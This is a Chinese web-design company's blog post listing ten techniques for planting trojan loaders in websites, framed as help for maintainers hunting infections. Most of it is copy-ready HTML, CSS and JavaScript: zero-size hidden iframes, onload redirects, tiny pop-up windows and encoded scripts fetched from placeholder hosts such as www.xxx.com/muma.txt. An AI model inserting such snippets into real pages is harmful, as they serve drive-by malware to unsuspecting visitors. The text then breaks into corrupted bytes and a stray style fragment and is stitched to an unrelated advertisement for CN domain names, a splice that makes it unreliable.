最常见的十种网站挂马手段
来源:本站时间:2013/10/21 10:48:27

目前网站被挂马的现象呈上升趋势,聊城网络公司吉恩创想认为这需要从两方面下手加以预防,即机房网管在硬件上做好预防工作,网站建设维护人员在建站之初充分考虑到可能被挂马的细节,尽量避免客户受到不必要的损失。

现在主要有以下十种网站挂马手段,各位网站建设和维护人员可以参考一下:

:高级欺骗

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" #111nMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a>

<SCRIPT Language="#106avascript">

function www_163_com ()

{

var url="网马地址";

open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");

}

</SCRIPT>

:JAJA挂马

<SCRIPT language=#106avascript>

window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

</script>

:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

muma.txt可改成任意后缀

:body挂马

<body onload="window.location='地址';"></body>

:伪装调用

<frameset rows="444,0" cols="*">

<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">

<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

</frameset>

:css中挂马

body {

background-image: url('#106avascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

:js文件挂马

首先将以下代码

document.write("<iframe width='0' height='0' src='地址'></iframe>");

保存为xxx.js

JS挂马代码为

<script language=#106avascript src=xxx.js></script>

:图片伪装

<html>

<iframe src="网马地址" height=0 width=0></iframe>

<img src="图片地址"></center>

</html>

:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

:框架挂马

<iframe src=地址 width=0 height=0></iframe>

在怀疑网站被挂马的情况下,可以着重对以上几种情况加以分析,争取尽快找出木马所在将其清理,并针对漏洞作出有效的补救措施。

�ot�9�P�� "Times New Roman";mso-hansi-font-family:"Times New Roman"'>案例,在域名被掠夺后直接导致这家成功的企业最终倒闭。当然,由于法律的倾向性保护,中国注册者要从外国公司的手下“翻身”很难。对于中国注册者而言,更多的应该是考虑如何避免毁灭性灾难。可喜的是,据统计,目前大量的企业已经将自己的CN域名也进行了注册和启用,由此极大地降低了COM域名被掠夺后的损失。

对于中国企业而言,急需在信息时代建立网络品牌体系,作为由我国管理的CN域名,对此有着不可多得的优势。通过选用CN域名,不仅可以在丰富的资源中选取简短的好名字,同时又能得到良好的安全保障。CN域名是目前唯一采取“24小时响应机制”的域名,保障了注册者能够在第一时间解决自己的域名问题。吉恩创想认为,提升企业域名安全等级的最佳途径就是启用CN域名。既提升了网络品牌形象,又防范了域名掠夺招致的灭顶之灾,可谓一举两得。